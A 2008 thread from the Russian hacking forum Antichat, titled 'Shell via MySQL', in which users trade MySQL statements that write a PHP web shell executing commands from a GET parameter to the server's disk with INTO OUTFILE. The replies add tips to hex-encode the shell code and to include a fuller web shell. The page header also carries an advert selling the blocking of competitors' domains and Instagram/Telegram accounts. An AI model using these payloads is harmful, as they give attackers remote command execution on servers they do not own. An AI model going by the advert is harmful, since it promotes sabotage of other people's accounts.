Шелл через MySQL

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Шелл через MySQL

Опции темы

Поиск в этой теме

Опции просмотра

14.05.2008, 11:31

Grey

Познавший АНТИЧАТ

Регистрация: 10.06.2006

Сообщений: 1,113

С нами: 10483586

Репутация: 5826

Цитата:

Сообщение от _Pantera_

create table `lamak` (`phpcod` text not null);
insert into `lamak` (`phpcod`) values ('<? system($_GET[cmd]);?>');
select phpcod from `lamak` into outfile '/tmp/shell.php';
drop table `lamak`;

Только мой тебе совет, гет не используй, лучше поставь инклуд на нормальный веб-шелл.

Хм, зачем создавать таблицу, запихивать в неё код шелла, затем выводить это все в файл, получая шелл, а затем удалять таблицу?

На много проще будет сразу записать данные в файл:

Код:

select '<?php system($_GET["cmd"]); ?>' into outfile '/home/www/ .... /shell.php'

Только код шелла советую предварительно запихивать в хексы.

А вообще поиск юзать нужно перед созданием темы - обсуждалось и не раз.

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules